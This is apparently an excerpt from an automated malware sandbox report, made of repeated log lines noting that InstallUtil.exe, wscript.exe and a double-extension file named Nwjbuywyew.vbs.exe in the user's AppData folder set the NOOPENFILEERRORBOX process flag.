Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe	Process information set: NOOPENFILEERRORBOX
